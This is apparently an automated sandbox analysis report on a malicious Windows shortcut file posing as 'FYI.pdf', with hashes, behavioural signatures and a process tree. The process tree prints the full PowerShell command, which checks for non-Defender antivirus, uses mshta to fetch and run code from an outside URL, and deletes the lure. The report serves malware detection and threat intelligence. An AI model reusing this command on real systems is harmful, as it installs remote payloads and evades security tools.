Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
29/02/2024, 05:56
Static task
static1
Behavioral task
behavioral1
Sample
d8dbb40faf7b8585dc9963d2addf23d922c517623a24770e42f91dbe58975194.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
d8dbb40faf7b8585dc9963d2addf23d922c517623a24770e42f91dbe58975194.lnk
Resource
win10v2004-20240226-en
General
-
Target
d8dbb40faf7b8585dc9963d2addf23d922c517623a24770e42f91dbe58975194.lnk
-
Size
2KB
-
MD5
7aedf8f8a11a97880b16544588f15683
-
SHA1
a31781401cc7dac39e62d4812c17cf96f889d350
-
SHA256
d8dbb40faf7b8585dc9963d2addf23d922c517623a24770e42f91dbe58975194
-
SHA512
db9be41e532757c4e5cb0cc1a8630000718aeb50bce2c4fa937861f445d4e9f35478e64b78fd273c09ae6fe45e8e4c6a3c5f3600e1948cca23137b90f5ecf14c
Malware Config
Extracted
https://thanhancompany.com/grip/FYI
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2532 mshta.exe 6 2532 mshta.exe 7 2532 mshta.exe 8 2532 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2172 wrote to memory of 2696 2172 cmd.exe 29 PID 2172 wrote to memory of 2696 2172 cmd.exe 29 PID 2172 wrote to memory of 2696 2172 cmd.exe 29 PID 2696 wrote to memory of 2532 2696 powershell.exe 30 PID 2696 wrote to memory of 2532 2696 powershell.exe 30 PID 2696 wrote to memory of 2532 2696 powershell.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\d8dbb40faf7b8585dc9963d2addf23d922c517623a24770e42f91dbe58975194.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $j = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($u in $j ){if ($u.displayName -replace 'Windows Defender', ''){Exit}}.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://thanhancompany.com/grip/FYI;$EPWZ = Get-Location;$EPWZ = Join-Path $EPWZ 'FYI.pdf.lnk';del $EPWZ2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://thanhancompany.com/grip/FYI3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:2532
-
-